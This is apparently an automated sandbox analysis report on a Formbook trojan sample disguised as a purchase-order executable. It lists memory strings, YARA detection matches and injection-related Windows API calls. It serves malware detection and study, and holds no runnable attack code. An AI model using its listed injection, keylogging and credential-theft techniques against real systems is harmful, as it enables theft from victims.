            Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.4623285061.0000000004182000.00000004.10000000.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.0000000003672000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.4623285061.0000000004182000.00000004.10000000.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.0000000003672000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4617655793.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oau
            Source: netbtugc.exe, 00000004.00000002.4617655793.0000000000526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000003.2487178602.000000000772B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033.d
            Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4623285061.00000000047CA000.00000004.10000000.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.0000000003CBA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?pnGX8L3p=mxnR
            Source: netbtugc.exe, 00000004.00000002.4623285061.0000000003E5E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4625520425.0000000005D00000.00000004.00000800.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.000000000334E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.000000000334E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001BEAFF
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_001BED6A
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001BEAFF
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001AAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_001AAA57
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001D9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_001D9576

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: PO-DOC1522025-12.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PO-DOC1522025-12.exe, 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0586316f-1
            Source: PO-DOC1522025-12.exe, 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_737482a6-d
            Source: PO-DOC1522025-12.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_67b7bc8c-8
            Source: PO-DOC1522025-12.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_eec1251c-9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C60 NtCreateKey,2_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473090 NtSetValueKey,2_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D70 NtOpenThread,2_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B14340 NtSetContextThread,LdrInitializeThunk,4_2_00B14340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B14650 NtSuspendThread,LdrInitializeThunk,4_2_00B14650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12AF0 NtWriteFile,LdrInitializeThunk,4_2_00B12AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12AD0 NtReadFile,LdrInitializeThunk,4_2_00B12AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_00B12BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_00B12BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12BE0 NtQueryValueKey,LdrInitializeThunk,4_2_00B12BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12B60 NtClose,LdrInitializeThunk,4_2_00B12B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_00B12CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00B12C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12C60 NtCreateKey,LdrInitializeThunk,4_2_00B12C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_00B12DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12DD0 NtDelayExecution,LdrInitializeThunk,4_2_00B12DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_00B12D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12D10 NtMapViewOfSection,LdrInitializeThunk,4_2_00B12D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_00B12E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12EE0 NtQueueApcThread,LdrInitializeThunk,4_2_00B12EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12FB0 NtResumeThread,LdrInitializeThunk,4_2_00B12FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12FE0 NtCreateFile,LdrInitializeThunk,4_2_00B12FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12F30 NtCreateSection,LdrInitializeThunk,4_2_00B12F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B135C0 NtCreateMutant,LdrInitializeThunk,4_2_00B135C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B139B0 NtGetContextThread,LdrInitializeThunk,4_2_00B139B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12AB0 NtWaitForSingleObject,4_2_00B12AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12B80 NtQueryInformationFile,4_2_00B12B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12CF0 NtOpenProcess,4_2_00B12CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12CC0 NtQueryVirtualMemory,4_2_00B12CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12C00 NtQueryInformationProcess,4_2_00B12C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12DB0 NtEnumerateKey,4_2_00B12DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12D00 NtSetInformationFile,4_2_00B12D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12EA0 NtAdjustPrivilegesToken,4_2_00B12EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12E30 NtWriteVirtualMemory,4_2_00B12E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12FA0 NtQuerySection,4_2_00B12FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12F90 NtProtectVirtualMemory,4_2_00B12F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B12F60 NtCreateProcessEx,4_2_00B12F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B13090 NtSetValueKey,4_2_00B13090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B13010 NtOpenDirectoryObject,4_2_00B13010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B13D10 NtOpenProcessToken,4_2_00B13D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B13D70 NtOpenThread,4_2_00B13D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001E7920 NtCreateFile,4_2_001E7920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001E7A70 NtReadFile,4_2_001E7A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001E7B50 NtDeleteFile,4_2_001E7B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001E7BE0 NtClose,4_2_001E7BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001E7D30 NtAllocateVirtualMemory,4_2_001E7D30
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001AD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_001AD5EB
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_001A1201
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001AE8F6
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B20460_2_001B2046
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001480600_2_00148060
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001A82980_2_001A8298
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0017E4FF0_2_0017E4FF
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0017676B0_2_0017676B
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001D48730_2_001D4873
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0016CAA00_2_0016CAA0
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0014CAF00_2_0014CAF0
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0015CC390_2_0015CC39
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00176DD90_2_00176DD9
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0015B1190_2_0015B119
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001491C00_2_001491C0
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001613940_2_00161394
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0016781B0_2_0016781B
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001479200_2_00147920
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0015997D0_2_0015997D
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00167A4A0_2_00167A4A
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00167CA70_2_00167CA7
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001CBE440_2_001CBE44
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00179EEE0_2_00179EEE
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_0014BF400_2_0014BF40
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_00F4DF500_2_00F4DF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168712_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168732_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028A02_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101732_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011102_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1F32_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012902_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035002_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040268A2_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026982_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF4A2_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D7532_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF532_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA3522_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F02_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035003E62_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E02742_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C02C02_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C81582_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034301002_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA1182_2_034DA118
